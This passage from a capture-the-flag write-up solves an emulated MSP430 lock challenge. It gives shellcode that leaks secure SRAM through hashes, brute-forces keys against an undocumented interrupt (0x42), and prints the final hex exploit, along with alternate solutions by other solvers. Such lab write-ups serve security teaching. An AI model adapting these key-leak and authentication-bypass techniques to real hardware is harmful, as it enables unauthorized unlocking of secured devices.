print(binascii.hexlify(output_little_endian).decode())

Second Stage Payload

Data Section Tweaks

Changes to the data section are as follows.

3040 0080 ffff 0003
ffaf 00b5 0000 0000
0000 0000 0000 0000
0000 0000 0000 0000
0000 0000 0000 0000
0000 0000 0000 0000

Because there are usually no more than 0x140 bytes of nonzero data, the payload only leaks the first 0x300 bytes of secure memory.

3040 0080 ffff 0003
ffaf 00b5 0000 0000
0000 0000 0000 0000
0000 0000 0000 0000
0000 0000 0000 0000
0000 0000 0000 0000

Extending The Shellcode

There must be a mechanism to read the leaked contents of SRAM back into MCU memory after the external rainbow table lookups are complete.

      ┌─────────┬─────────────────────┐
      │3e40 00f0│mov  #0xf000, r14    │
      ├─────────┼─────────────────────┤
      │3f40 0090│mov  #0x9000, r15    │
┌──┐  ├─────────┼─────────────────────┤
│PC├─►│b012 6845│call #0x4568 <getsn> │
└──┘  └─────────┴─────────────────────┘

                        ┌─────────────────────┐
                        │      EXTERNAL       │
                        ├─────────────────────┤
                        │[RECOVERED SRAM DATA]│
                        └─────────┬───────────┘
                                  │
                                  │ READ
                                  │ INTO
                                  ▼
      ┌────────────────┬────────┬────┬───┬────┐
      │                │CONTENTS│0000│...│0000│
      │CANONICAL BUFFER├────────┼────┼───┼────┤
      │                │ADDRESS │9000│...│9300│
      └────────────────┴────────┴────┴───┴────┘

This getsn call will read 0xF000 The buffer size for the input is arbitrarily large—convenient but not strictly necessary. bytes from user input and write them to address 0x9000 in the main MCU memory. This buffer will be the canonical, unchanging copy of the SRAM data.

Following this, the shellcode copies the entire input buffer to address 0xB000 via a call to memcpy.

      ┌─────────┬─────────────────────┐
      │3e40 00f0│mov  #0xf000, r14    │
      ├─────────┼─────────────────────┤
      │3f40 0090│mov  #0x9000, r15    │
      ├─────────┼─────────────────────┤
      │b012 6845│call #0x4568 <getsn> │
      ├─────────┼─────────────────────┤
      │3d40 0010│mov  #0x1000, r13    │
      ├─────────┼─────────────────────┤
      │3e40 0090│mov  #0x9000, r14    │
      ├─────────┼─────────────────────┤
      │3f40 00b0│mov  #0xb000, r15    │
┌──┐  ├─────────┼─────────────────────┤
│PC├─►│b012 a445│call #0x45a4 <memcpy>│
└──┘  └─────────┴─────────────────────┘

                                 ┌──────────────┐
                                 │              │
      ┌────────────────┬────────┬┴───┬───┬────┐ │
      │                │CONTENTS│XXXX│...│0000│ │
      │CANONICAL BUFFER├────────┼────┼───┼────┤ │
      │                │ADDRESS │9000│...│9300│ │
      └────────────────┴────────┴────┴───┴────┘ │
                                                │
                              ┌─────────────────┘
                              ▼
      ┌─────────────┬────────┬────┬───┬────┐
      │             │CONTENTS│XXXX│...│0000│
      │SHADOW BUFFER├────────┼────┼───┼────┤
      │             │ADDRESS │B000│...│B300│
      └─────────────┴────────┴────┴───┴────┘

This code is part of the loop that repeatedly calls interrupt 0x41. The memory at address 0xB000 shadows address 0x9000. The shellcode will overwrite it with unchanging data from the canonical buffer after each iteration, ensuring that unknown side effects do not corrupt it after the return from the interrupt callgate.

Next is the counter for the current position in the shadow buffer.

       ┌─────────┬─────────────────────┐
       │3e40 00f0│mov  #0xf000, r14    │
       ├─────────┼─────────────────────┤
       │3f40 0090│mov  #0x9000, r15    │
       ├─────────┼─────────────────────┤
       │b012 6845│call #0x4568 <getsn> │
       ├─────────┼─────────────────────┤
       │3d40 0010│mov  #0x1000, r13    │
       ├─────────┼─────────────────────┤
       │3e40 0090│mov  #0x9000, r14    │
       ├─────────┼─────────────────────┤
       │3f40 00b0│mov  #0xb000, r15    │
       ├─────────┼─────────────────────┤
       │b012 a445│call #0x45a4 <memcpy>│
┌───┐  ├─────────┼─────────────────────┤
│PC¹├─►│1d42 0a80│mov  &0x800a, r13    │
├───┤  ├─────────┼─────────────────────┤
│PC²├─►│1d53     │inc  r13             │
├───┤  ├─────────┼─────────────────────┤
│PC³├─►│824d 0a80│mov  r13, &0x800a    │
└───┘  └─────────┴─────────────────────┘

       ┌──────┐
       │      │
       │ DATA │
       │      │
       ├──────┤
       │ 3040 │
       ├──────┤
       │ 0080 │
       ├──────┤
       │ FFFF │
       ├──────┤      ┌────┐           ┌────┐
       │ 0003 │      │R13:│           │R13:│
       ├──────┤ LOAD¹├────┤ INCREMENT²├────┤
     ┌►│ FFAF ├─────►│AFFF├──────────►│B000│
     │ ├──────┤      └────┘           └─┬──┘
     │ │ 00b5 │                         │
     │ ├──────┤                         │
     │ │ .... │                         │
     │ ├──────┤                         │
     │ │ .... │                         │
     │ └──────┘                         │
     │               STORE³             │
     └──────────────────────────────────┘

The fifth word in the data section stores this variable.

3040 0080 ffff 0003
ffaf 00b5 0000 0000
0000 0000 0000 0000
0000 0000 0000 0000
0000 0000 0000 0000
0000 0000 0000 0000

The value of 0xAFFF will be incremented by 0x1, making it 0xB000 (the beginning of the shadow buffer). This value is the start offset where the current key candidate begins. It will be incremented by one with each iteration of the loop.

current_offset = 1

  ┌──────┐
  │      │
  │ DATA │
  │      │
  ├──────┤
  │ 3040 │
  ├──────┤
  │ 0080 │
  ├──────┤
  │ FFFF │
  ├──────┤      ┌────┐           ┌────┐
  │ 0003 │      │R13:│           │R13:│
  ├──────┤ LOAD¹├────┤ INCREMENT²├────┤
┌►│ 00B0 ├─────►│B000├──────────►│B001│
│ ├──────┤      └────┘           └─┬──┘
│ │ 00b5 │                         │
│ ├──────┤                         │
│ │ .... │                         │
│ ├──────┤                         │
│ │ .... │                         │
│ └──────┘                         │
│               STORE³             │
└──────────────────────────────────┘

current_offset = 2

  ┌──────┐
  │      │
  │ DATA │
  │      │
  ├──────┤
  │ 3040 │
  ├──────┤
  │ 0080 │
  ├──────┤
  │ FFFF │
  ├──────┤      ┌────┐           ┌────┐
  │ 0003 │      │R13:│           │R13:│
  ├──────┤ LOAD¹├────┤ INCREMENT²├────┤
┌►│ 01B0 ├─────►│B001├──────────►│B002│
│ ├──────┤      └────┘           └─┬──┘
│ │ 00b5 │                         │
│ ├──────┤                         │
│ │ .... │                         │
│ ├──────┤                         │
│ │ .... │                         │
│ └──────┘                         │
│               STORE³             │
└──────────────────────────────────┘

The payload passes the parameters for the 0x41 interrupt as follows.

      ┌─────────┬─────────────────────┐
      │3e40 00f0│mov  #0xf000, r14    │
      ├─────────┼─────────────────────┤
      │3f40 0090│mov  #0x9000, r15    │
      ├─────────┼─────────────────────┤
      │b012 6845│call #0x4568 <getsn> │
      ├─────────┼─────────────────────┤
      │3d40 0010│mov  #0x1000, r13    │
      ├─────────┼─────────────────────┤
      │3e40 0090│mov  #0x9000, r14    │
      ├─────────┼─────────────────────┤
      │3f40 00b0│mov  #0xb000, r15    │
      ├─────────┼─────────────────────┤
      │b012 a445│call #0x45a4 <memcpy>│
      ├─────────┼─────────────────────┤
      │1d42 0a80│mov  &0x800a, r13    │
      ├─────────┼─────────────────────┤
      │1d53     │inc  r13             │
      ├─────────┼─────────────────────┤
      │824d 0a80│mov  r13, &0x800a    │
      ├─────────┼─────────────────────┤
      │0d12     │push r13             │
      ├─────────┼─────────────────────┤
      │0d12     │push r13             │
      ├─────────┼─────────────────────┤
      │0d12     │push r13             │
      ├─────────┼─────────────────────┤
      │0d12     │push r13             │
      ├─────────┼─────────────────────┤
      │2312     │push #0x2            │
      ├─────────┼─────────────────────┤
      │2312     │push #0x2            │
      ├─────────┼─────────────────────┤
      │3012 4100│push #0x41           │
┌──┐  ├─────────┼─────────────────────┤
│PC├─►│b012 5045│call #0x4550 <INT>   │
└──┘  ├─────────┼─────────────────────┤
      │3150 0e00│add  #0xe, sp        │
      └─────────┴─────────────────────┘

      ┌──────────────────────────────────────────────────┐
      │                 STACK                            │
┌──┐  ├──────┬───────────────────────────────────────────┤
│SP├─►│SP+0x0│0x41 (INTERRUPT NUMBER)                    │
└──┘  ├──────┼───────────────────────────────────────────┤
      │SP+0x2│0x2 (OFFSET)                               │
      ├──────┼───────────────────────────────────────────┤
      │SP+0x4│0x2 (LENGTH)                               │
      ├──────┼───────────────────────────────────────────┤
      │SP+0x6│POINTER TO SHADOW BUFFER + CURRENT_OFFSET  │
      ├──────┼───────────────────────────────────────────┤
      │SP+0x8│POINTER TO SHADOW BUFFER + CURRENT_OFFSET  │
      ├──────┼───────────────────────────────────────────┤
      │SP+0xa│POINTER TO SHADOW BUFFER + CURRENT_OFFSET  │
      ├──────┼───────────────────────────────────────────┤
      │SP+0xc│POINTER TO SHADOW BUFFER + CURRENT_OFFSET  │
      └──────┴───────────────────────────────────────────┘

It is unclear which stack word should contain the pointer to the key, but it obviously cannot replace the offset or length because that would break the hashing logic. Valid dummy values (0x2) serve as surrogates for these two words. The four words after that contain the pointer to the current offset in the shadow buffer. The call should succeed if interrupt 0x41 interprets one of these stack words as a key pointer.

There must be some mechanism to verify whether the secure element accepted the key and unblocked the unlock interrupt, so it is tested by attempting to call the latter.

      ┌─────────┬─────────────────────┐
      │3e40 00f0│mov  #0xf000, r14    │
      ├─────────┼─────────────────────┤
      │3f40 0090│mov  #0x9000, r15    │
      ├─────────┼─────────────────────┤
      │b012 6845│call #0x4568 <getsn> │
      ├─────────┼─────────────────────┤
      │3d40 0010│mov  #0x1000, r13    │
      ├─────────┼─────────────────────┤
      │3e40 0090│mov  #0x9000, r14    │
      ├─────────┼─────────────────────┤
      │3f40 00b0│mov  #0xb000, r15    │
      ├─────────┼─────────────────────┤
      │b012 a445│call #0x45a4 <memcpy>│
      ├─────────┼─────────────────────┤
      │1d42 0a80│mov  &0x800a, r13    │
      ├─────────┼─────────────────────┤
      │1d53     │inc  r13             │
      ├─────────┼─────────────────────┤
      │824d 0a80│mov  r13, &0x800a    │
      ├─────────┼─────────────────────┤
      │0d12     │push r13             │
      ├─────────┼─────────────────────┤
      │0d12     │push r13             │
      ├─────────┼─────────────────────┤
      │0d12     │push r13             │
      ├─────────┼─────────────────────┤
      │0d12     │push r13             │
      ├─────────┼─────────────────────┤
      │2312     │push #0x2            │
      ├─────────┼─────────────────────┤
      │2312     │push #0x2            │
      ├─────────┼─────────────────────┤
      │3012 4100│push #0x41           │
      ├─────────┼─────────────────────┤
      │b012 5045│call #0x4550 <INT>   │
      ├─────────┼─────────────────────┤
      │3150 0e00│add  #0xe, sp        │
      ├─────────┼─────────────────────┤
      │3240 00ff│mov  #0xff00, sr     │
┌──┐  ├─────────┼─────────────────────┤
│PC├─►│b012 1000│call #0x10           │
└──┘  └─────────┴─────────────────────┘

The successful unlock status message should appear if the current key candidate authenticates to the secure element.

Lastly, if the unlock interrupt call does not succeed, the last defined word in the data section is compared to the current offset in the shadow buffer. The code deliberately jumps into null memory and crashes if it is equal, signaling that execution has ended without finding a valid key.


       ┌─────────┬─────────────────────┐
       │3e40 00f0│mov  #0xf000, r14    │
       ├─────────┼─────────────────────┤
       │3f40 0090│mov  #0x9000, r15    │
       ├─────────┼─────────────────────┤
       │b012 6845│call #0x4568 <getsn> │
       ├─────────┼─────────────────────┤
       │3d40 0010│mov  #0x1000, r13    │
       ├─────────┼─────────────────────┤
       │3e40 0090│mov  #0x9000, r14    │
       ├─────────┼─────────────────────┤
       │3f40 00b0│mov  #0xb000, r15    │
       ├─────────┼─────────────────────┤
       │b012 a445│call #0x45a4 <memcpy>│
       ├─────────┼─────────────────────┤
       │1d42 0a80│mov  &0x800a, r13    │
       ├─────────┼─────────────────────┤
       │1d53     │inc  r13             │
       ├─────────┼─────────────────────┤
       │824d 0a80│mov  r13, &0x800a    │
       ├─────────┼─────────────────────┤       ┌──────┐
       │0d12     │push r13             │       │      │
       ├─────────┼─────────────────────┤       │ DATA │
       │0d12     │push r13             │       │      │
       ├─────────┼─────────────────────┤       ├──────┤
       │0d12     │push r13             │       │ 3040 │
       ├─────────┼─────────────────────┤       ├──────┤
       │0d12     │push r13             │       │ 0080 │
       ├─────────┼─────────────────────┤       ├──────┤
       │2312     │push #0x2            │       │ FFFF │
       ├─────────┼─────────────────────┤       ├──────┤
       │2312     │push #0x2            │       │ 0003 │
       ├─────────┼─────────────────────┤       ├──────┤      ┌────┐
       │3012 4100│push #0x41           │       │ FFAF │      │R6: │
       ├─────────┼─────────────────────┤       ├──────┤ LOAD¹├────┤
       │b012 5045│call #0x4550 <INT>   │       │ 00b5 ├─────►│B500│
       ├─────────┼─────────────────────┤       ├──────┤      └─┬──┘
       │3150 0e00│add  #0xe, sp        │       │ .... │        │
       ├─────────┼─────────────────────┤       ├──────┤        │
       │3240 00ff│mov  #0xff00, sr     │       │ .... │        │
       ├─────────┼─────────────────────┤       └──────┘        │
       │b012 1000│call #0x10           │                       │
┌───┐  ├─────────┼─────────────────────┤       ┌─────────────┐ │
│PC¹├─►│1742 0c80│mov  &0x800c, r7     │       │   COMPARE²  │ │
├───┤  ├─────────┼─────────────────────┤       ├─────────────┤ │
│PC²├─►│0d97     │cmp  r7, r13         │       │             │ │
├───┤  ├─────────┼─────────────────────┤       │ ┌───┐ ┌───┐ │ │
│PC³├─►│0424     │jz   $+0xa           ├─────┐ │ │R7 │ │R13│ │◄┘
└───┘  ├─────────┼─────────────────────┤     │ │ └───┘ └───┘ │
       │3040 6880│br   #0x8068         │     │ │             │
       └─────────┴─────────────────────┘     │ └─────────────┘
                                             │
                 ┌───────────┐               │
                 │NULL MEMORY│◄──────────────┘
                 └─────┬─────┘  JUMP IF EQUAL³
                       │
                       ▼
                 ┌───────────┐
                 │---CRASH---│
                 └───────────┘

This word is as follows:

3040 0080 ffff 0003
ffaf 00b5 0000 0000
0000 0000 0000 0000
0000 0000 0000 0000
0000 0000 0000 0000
0000 0000 0000 0000

The leaked SRAM data in the shadow buffer usually ranges from address 0xB000 to 0xB140, but this is not guaranteed. This section of the payload code assumes the maximum length is 0x500. Execution branches back to the section that refreshes the shadow buffer if the address of the current offset is less than 0xB500.



      ┌─────────┬─────────────────────┐
      │3e40 00f0│mov  #0xf000, r14    │
      ├─────────┼─────────────────────┤
      │3f40 0090│mov  #0x9000, r15    │
      ├─────────┼─────────────────────┤
      │b012 6845│call #0x4568 <getsn> │
      ├─────────┼─────────────────────┤
      │3d40 0010│mov  #0x1000, r13    │◄───────┐
      ├─────────┼─────────────────────┤        │
      │3e40 0090│mov  #0x9000, r14    │        │
      ├─────────┼─────────────────────┤        │
      │3f40 00b0│mov  #0xb000, r15    │        │
      ├─────────┼─────────────────────┤        │
      │b012 a445│call #0x45a4 <memcpy>│        │
      ├─────────┼─────────────────────┤        │
      │1d42 0a80│mov  &0x800a, r13    │        │
      ├─────────┼─────────────────────┤        │
      │1d53     │inc  r13             │        │
      ├─────────┼─────────────────────┤        │
      │824d 0a80│mov  r13, &0x800a    │        │
      ├─────────┼─────────────────────┤        │
      │0d12     │push r13             │        │
      ├─────────┼─────────────────────┤        │
      │0d12     │push r13             │        │
      ├─────────┼─────────────────────┤        │
      │0d12     │push r13             │        │
      ├─────────┼─────────────────────┤        │
      │0d12     │push r13             │        │
      ├─────────┼─────────────────────┤        │
      │2312     │push #0x2            │        │
      ├─────────┼─────────────────────┤        │
      │2312     │push #0x2            │        │
      ├─────────┼─────────────────────┤        │
      │3012 4100│push #0x41           │        │
      ├─────────┼─────────────────────┤        │
      │b012 5045│call #0x4550 <INT>   │        │
      ├─────────┼─────────────────────┤        │
      │3150 0e00│add  #0xe, sp        │        │
      ├─────────┼─────────────────────┤        │
      │3240 00ff│mov  #0xff00, sr     │        │
      ├─────────┼─────────────────────┤        │
      │b012 1000│call #0x10           │        │
      ├─────────┼─────────────────────┤        │
      │1742 0c80│mov  &0x800c, r7     │        │
      ├─────────┼─────────────────────┤        │
      │0d97     │cmp  r7, r13         │        │
      ├─────────┼─────────────────────┤        │
      │0424     │jz   $+0xa           │        │
┌──┐  ├─────────┼─────────────────────┤ BRANCH │
│PC├─►│3040 6880│br   #0x8068         ├────────┘
└──┘  └─────────┴─────────────────────┘

The assembled payload is below.

8000 ff

183c
3040 0080 ffff 0003
ffaf 00b5 0000 0000
0000 0000 0000 0000
0000 0000 0000 0000
0000 0000 0000 0000
0000 0000 0000 0000

3440 0280 a244 ee44 2453 a244 f044

0d41
3e40 0100
1f42 0680
1f53
824f 0680
1642 0880
0f96
0224
3040 a644

3e40 00f0 3f40 0090 b012 6845

3d40 0010
3e40 0090
3f40 00b0
b012 a445

1d42 0a80
1d53
824d 0a80

0d12
0d12
0d12
0d12
2312
2312

3012 4100
b012 5045
3150 0e00

3240 00ff b012 1000

1742 0c80
0d97
0424
3040 6880

Results and Analysis

Running this payload with either big or little endian SRAM data results in the following output.

insn address unaligned
CPUOFF flag set; program no longer running. CPU must now be reset.

Payload execution completes without any key candidate unblocking the unlock interrupt. There are a few plausible explanations for this.

Stripping an additional layer of encoding from the SRAM data is necessary.

Unlikely. It might be reasonable to assume the presence of encoding Many non-whitespace characters and multiple equal signs might indicate base64, for example. if the extracted data had a consistent format, but the hexdump of the data does not seem to have any discernible pattern.

The calling convention requires the key to be passed directly on the stack rather than as a pointer.

This one is slightly more realistic, but (given that this system uses a 16-bit processor) a value that is eight words wide is relatively large to pass directly on the stack. Passing the literal value would make more sense with a small key value (i.e., 1 or 2 words). The payload code required to test this is inconvenient to implement, so this possibility is discounted for now.

The interrupt number is simply wrong.

This scenario is absurd but possible.

Here Be Dragons

The third option is worthy of consideration in the absence of saner alternatives. The correct interrupt number may not be 0x41.

Strange Behavior

This theory is not as far-fetched as it might at first appear. Recall the calling convention for the 0x41 interrupt call. There are only a few stack locations to pass a key pointer.

      ┌────────────────────────────────────────┐
      │                 STACK                  │
┌──┐  ├──────┬─────────────────────────────────┤
│SP├─►│SP+0x0│0x41 (INTERRUPT NUMBER)          │
└──┘  ├──────┼─────────────────────────────────┤
      │SP+0x2│OFFSET                           │
      ├──────┼─────────────────────────────────┤
      │SP+0x4│LENGTH                           │
      ├──────┼─────────────────────────────────┤
      │SP+0x6│POINTER TO CHECKSUM RETURN BUFFER├──┐
      ├──────┼─────────────────────────────────┤  │
      │SP+0x8│RETURN ADDRESS (MAIN)            │  │
      ├──────┼─────────────────────────────────┤  │
      │SP+0xa│CHECKSUM RETURN BUFFER + 0x0     │◄─┘
      ├──────┼─────────────────────────────────┤
      │SP+0xc│CHECKSUM RETURN BUFFER + 0x2     │
      ├──────┼─────────────────────────────────┤
      │SP+0xe│CHECKSUM RETURN BUFFER + 0x4     │
      └──────┴─────────────────────────────────┘

It is implausible that the implementation would reference a pointer outside the current stack frame, which rules out the first three words of the checksum return buffer. While not impossible, this implementation choice would be so outlandish as to be outright broken.

The only remaining option is the pointer to the checksum return buffer at SP+0x6, which could theoretically double as the pointer to the key. Recall that the interrupt call dereferences this pointer and overwrites the buffer with the SRAM hash.

            ┌───────────────────────────────────────┐
            │        CHECKSUM RETURN BUFFER         │
     ┌───┐  ├───────────────────────────────────────┤
     │KEY├─►│AAAA AAAA AAAA AAAA AAAA AAAA AAAA AAAA├─┐
     └───┘  ├───────────────────────────────────────┤ │
            │0000 0000 0000 0000 0000 0000 0000 0000│ │
            └───────────────────────────────────────┘ │
                                                      ▼
                                            ┌────────────────────┐
                                            │CALL sha256_internal│
                                            └─────────┬──────────┘
                                                      │
            ┌───────────────────────────────────────┐ │
            │        CHECKSUM RETURN BUFFER         │ │
┌────────┐  ├───────────────────────────────────────┤ │
│KEY     ├─►│XXXX XXXX XXXX XXXX XXXX XXXX XXXX XXXX│◄┘
│OVER    │  ├───────────────────────────────────────┤
│WRITTEN │  │XXXX XXXX XXXX XXXX XXXX XXXX XXXX XXXX│
│BY      │  └───────────────────────────────────────┘
│CHECKSUM│
└────────┘

Combining two disparate pieces of functionality (hashing SRAM and passing the key) into a single interrupt call is odd. The returned SRAM hash would clobber the key. The side effect is, for lack of a better word, inelegant. It would be cleaner to separate these two pieces of functionality into different interrupt calls.

Psychological Warfare

Recall the description from the "manual" command.

Any payload is allowed, because the unlock key must be passed to the new interrupt with code 0x41, and this key is only stored in secure memory.

The I/O console prints the following output on each run.

0x7f interrupt disabled, key stored in internal SRAM
unlock by providing the 16 byte key to 0x41 interrupt

A developer making the same typo in two places is improbable, which implies that if the interrupt number is inaccurate, it is most likely deliberate and meant to hinder reverse engineering efforts. The information conveyed in the manual and status messages may be an instance of psychological warfare.

Interrupt Number Groupings

Extending the shellcode to automatically bruteforce the interrupt number is possible, but it is quicker to increment it by hand after narrowing the probable range. The manual PDF does not document the new interrupts, but the old ones seem to be grouped by the leading nibble of the interrupt number.

Interrupt Number Groupings
Type	Number
I/O	0x00
I/O	0x01
I/O	0x02
DEP	0x10
DEP	0x11
HSM	0x7D
HSM/Unlock	0x7E
Unlock	0x7F

This scheme suggests that all interrupts used for interfacing with the secure element fall into the 0x40-0x4F range.

Payload Modifications

Attempt 1

The likely place to start is with the other known interrupt in that range: 0x40. The firmware pushes two placeholder null words before the interrupt number. Either one of these might be a pointer to the key.

444a:  mov	#0x4658 "Enabling hardened mode", r15
444e:  call	#0x4586 <puts>
4452:  push	#0x0
4454:  push	#0x0
4456:  push	#0x40
445a:  call	#0x4550 <INT>

Modified Payload

0d12           push	r13
0d12           push	r13
0d12           push	r13
0d12           push	r13
0d12           push	r13
0d12           push	r13
3012 4000      push	#0x40
b012 5045      call	#0x4550
3150 0e00      add	#0xe, sp

The interrupt number should be decremented by one. The dummy values (0x2) can be replaced with the value of R13, as it is now unnecessary to adhere to the calling convention for the 0x41 interrupt.

Assembling and running the modified payload results in the following output at the debug console.

insn address unaligned
CPUOFF flag set; program no longer running. CPU must now be reset.

This crash indicates that the loop ended without sending a valid key to the correct interrupt.

Attempt 2

The next logical step is to try every possible interrupt in the 0x40-0x4F range, starting with 0x42.

Modified Payload

0d12           push	r13
0d12           push	r13
0d12           push	r13
0d12           push	r13
0d12           push	r13
0d12           push	r13
3012 4000      push	#0x42
b012 5045      call	#0x4550
3150 0e00      add	#0xe, sp

Authentication Bypass

Running the above payload and submitting the leaked SRAM data in big-endian format causes the unlock interrupt to trigger successfully.

Door Unlocked
The CPU completed in 4893366 cycles.

Final Exploit

8000 ff

183c
3040 0080 ffff 0003
ffaf 00b5 0000 0000
0000 0000 0000 0000
0000 0000 0000 0000
0000 0000 0000 0000
0000 0000 0000 0000

3440 0280 a244 ee44 2453 a244 f044

0d41
3e40 0100
1f42 0680
1f53
824f 0680
1642 0880
0f96
0224
3040 a644

3e40 00f0 3f40 0090 b012 6845

3d40 0010
3e40 0090
3f40 00b0
b012 a445

1d42 0a80
1d53
824d 0a80

0d12
0d12
0d12
0d12
0d12
0d12

3012 4200
b012 5045
3150 0e00

0312 0312 3012 7f00 b012 5045
3150 0600

1742 0c80
0d97
0424
3040 6880

Conclusion

Bug Reporting

After completing this challenge, it was worth reaching out to the creators and inquiring (as part of a report about multiple unrelated The new backend brought with it numerous ~~bugs~~ features. Those who thought the original set was too easy will praise the introduction of hard mode—in the form of the new and improved (dis)assembler. issues) whether the erroneous interrupt number in the manual and status messages was a deliberate attempt at psychological warfare.

The nature of the typo makes a subtle psychological difference: one reference might be mistaken, but multiple sources saying the same thing isn't an accident. [...] If the goal is to make it look like a mistake, only reference it in one place or not at all. If the goal is to make it look malicious, a third option is to add some window dressing to the level manual about how LockItAll hired a "psychological warfare specialist" to make their device unhackable.
— Email to challenge creators, November 1st, 2022

Competitive Sabotage

The same email included advice not to fix the typo if it was one.

If I had to suffer then everyone else should too :)
— Email to challenge creators, November 1st, 2022

Antics aside, there was an actual reason for this.

I liked the black box analysis angle. [...] [M]ake people infer that something in the 0x40-0x4f range must be the undocumented interrupt based on comparing it to the other known interrupt values. [...] I think it reinforces a useful philosophical mindset: don't trust the device developers too much, because if they knew what they were doing then the device wouldn't have vulnerabilities to begin with. Quite a few of the original 19 levels lied in the level manual or in the program output (about max password lengths or how the HSM-2 worked, for example). I think a deliberate typo or lie about actual interrupt numbers is a nice progression.
— Email to challenge creators, November 1st, 2022

It remains unclear whether the creators took this advice. The only response was as follows.

Apologies for the delay, you hit us up at an awkward time. And thank you for your well thought out description. We're looking into it.
— Response email, November 17th, 2022

Alternate Approaches

There are two alternate solutions written several months after the one described herein. These exploits bear review, as both differ from the one presented here.

Writeup by John Breaux

John Breaux published a writeup several months ago documenting a similar solution.

Alternate Leak Code

The main point of difference in this case was the decision to leak only the first few bytes of each hash.

There should be a way to uniquely identify a single byte using the first n bytes of output. We can find n by computing the hashes of the numbers 00-ff, and counting how many unique sequences there are when truncating those hashes to a certain length. [...] The start of my payload, which defines some constants, then saves 3 bytes of the hash of each byte in the internal SRAM, for later printing. — John Breaux

This trick makes it possible to represent the underlying SRAM data in fewer bytes, resulting in more compact information leak output. The following code accomplishes this.

get_sram_hashes:
clr   r11            ; loop variable in r11
mov   #msize, r14    ; r14 = 1
mov   #haddr, r13    ; set destination to 0x8000
sr_loop:
mov   r11, r15       ; mov addr r15
call  sha256_internal; <sha256_internal>
add   #hsize, r13    ; keep 3 bytes of the output
inc   r11            ; inc r11
cmp   #sr_len, r11        ; do that 0x1000 times
jnc   sr_loop

print_hex:
clr   r11;
ph_loop:
mov.b haddr(r11), r14
mov.b r14, r15
rra   r15            ; using rra here instead of rra.b means the value won't roll into the highest bit
rra   r15            ; which negates the need to and 0xf, r15
rra   r15
rra   r15
clrc
and   #0xf, r14
mov.b HEX_LUT(r15), r15
call  putchar        ; <putchar>
mov.b HEX_LUT(r14), r15
call  putchar        ; <putchar>
inc   r11            ; inc r11
cmp   #ha_len, r11        ; do that sram_length*3 times
jnc   ph_loop

mov.b #0xa, r15      ; '\n'
call  #0x4578        ; putchar ('\n')

It is probably simpler to reuse the existing code in main for printing leaked hashes, but this approach is relatively novel and faster in terms of execution speed.

Inferior Automation

The partial hash leakage approach ultimately became a liability, as it complicated the implementation and made it harder to spot subtle bugs.

I discovered a string formatting error in my python script that caused it to print /[0-9]/ when it meant /0[0-9]/ — John Breaux

This error corrupted input for the SRAM rainbow table lookup process and prevented Breaux from identifying interrupt 0x42 as the correct one (even though the payload code otherwise should have). The failure was a byproduct of the choice to leak only the first three bytes of each hash, as such a scheme required more convoluted Python code to massage the output back into the correct representation of the source data.

We exhausted our supply of ideas, and eventually concluded that the challenge must be broken. [...] Over the course of the next 6 months, the three of us worked collaboratively to figure out what went wrong.
— John Breaux

Not-So-Psychological-Warfare

Ultimately, someone else informed Breaux that the interrupt number was wrong.

Nothing was working, and it didn't seem to even attempt to use our keys. So, we contacted the challenge authors. No response. [...] But, eventually, a member of the ReSwitched Discord who happens to have access to the project informed us that there was a typo in both the directions and the program itself. — John Breaux

This information seemingly If any of the challenge authors are reading this page, confirmation would be appreciated. confirms that the erroneous interrupt number was a simple typographic issue rather than a deliberately malicious red herring.

Aside from the custom leak code, Breaux's approach is more or less identical to the one described herein. While it eventually succeeded, it seems to have been a time-consuming process that required aid from at least three other people.

Timing Analysis

It doesn't [...] take more than one cycle to execute. [...] Most other interrupts, if I remember right, cost something to run—are implemented somewhere within the MSP430 emulator's firmware. Yet this one isn't. It's just bizarre.
— John Breaux

While not directly relevant to the solution, Breaux uses an unorthodox technique to narrow down candidate interrupt numbers. There is a built-in debugger command that prints the current cycle count. Most interrupt calls take a few cycles to execute. By this logic, any interrupt number that takes multiple cycles must be doing something on the backend. Unfortunately, interrupt 0x42 seems to break this assumption.

Read Address Overflow Technique — Developed by Anonymous Author

The second alternate approach developed several months after the one described herein does not have a public writeup—but it utilizes a creative technique to identify the correct interrupt number.

Interrupt Side Effects

When I was poking around with alternate interrupt numbers, I did check if interrupt 0x42 did anything... But it didn't seem to. There are no side effects to calling INT 0x42.
— John Breaux

While a reasonable conclusion, this is not strictly true. A side effect in interrupt 0x42 is introducible via specifically chosen values passed on the stack.

After ruling out interrupt 0x41, testing subsequent interrupt numbers uses the following stack layout.

      ┌────────────────────────────────────────┐
      │                 STACK                  │
┌──┐  ├──────┬─────────────────────────────────┤
│SP├─►│SP+0x0│0x40-0x4F (INTERRUPT NUMBER)     │
└──┘  ├──────┼─────────────────────────────────┤
      │SP+0x2│KEY POINTER                      │
      ├──────┼─────────────────────────────────┤
      │SP+0x4│KEY POINTER                      │
      ├──────┼─────────────────────────────────┤
      │SP+0x6│KEY POINTER                      │
      ├──────┼─────────────────────────────────┤
      │SP+0x8│KEY POINTER                      │
      ├──────┼─────────────────────────────────┤
      │SP+0xa│KEY POINTER                      │
      ├──────┼─────────────────────────────────┤
      │SP+0xc│KEY POINTER                      │
      └──────┴─────────────────────────────────┘

It would be preferable to determine whether any given call is dereferencing the key pointer. It is possible to detect this on other architectures by providing a pointer to unmapped memory (e.g., a null pointer), that will cause a segmentation fault when dereferenced. Inconveniently, the entire memory space is writable by default on this ISA—dereferencing a null pointer will not cause a crash. A different (anonymous) individual found a way to overcome this limitation.

      ┌────────────────────────────────────────┐
      │                 STACK                  │
┌──┐  ├──────┬─────────────────────────────────┤
│SP├─►│SP+0x0│0x40-0x4F (INTERRUPT NUMBER)     │
└──┘  ├──────┼─────────────────────────────────┤
      │SP+0x2│0xFFFF                           │
      ├──────┼─────────────────────────────────┤
      │SP+0x4│0xFFFF                           │
      ├──────┼─────────────────────────────────┤
      │SP+0x6│0xFFFF                           │
      ├──────┼─────────────────────────────────┤
      │SP+0x8│0xFFFF                           │
      ├──────┼─────────────────────────────────┤
      │SP+0xa│0xFFFF                           │
      ├──────┼─────────────────────────────────┤
      │SP+0xc│0xFFFF                           │
      └──────┴─────────────────────────────────┘

Any attempt to interpret these dummy values as pointers will fail with the following error.

read address would wrap
CPUOFF flag set; program no longer running. CPU must now be reset.

This error occurs because attempting to read a word or multiple bytes starting from that address would cause an integer overflow and a wraparound to address 0x0000, which crashes the processor.

Out of all interrupts in the 0x40-0x4F range, this only occurs when calling interrupt 0x42. This pattern suggests that only interrupt 0x42 dereferences one of the pointers. The creator of this technique used it to narrow down which interrupts were attempting to read from MCU memory. Aside from that, the rest of their exploit is similar to the one described herein.

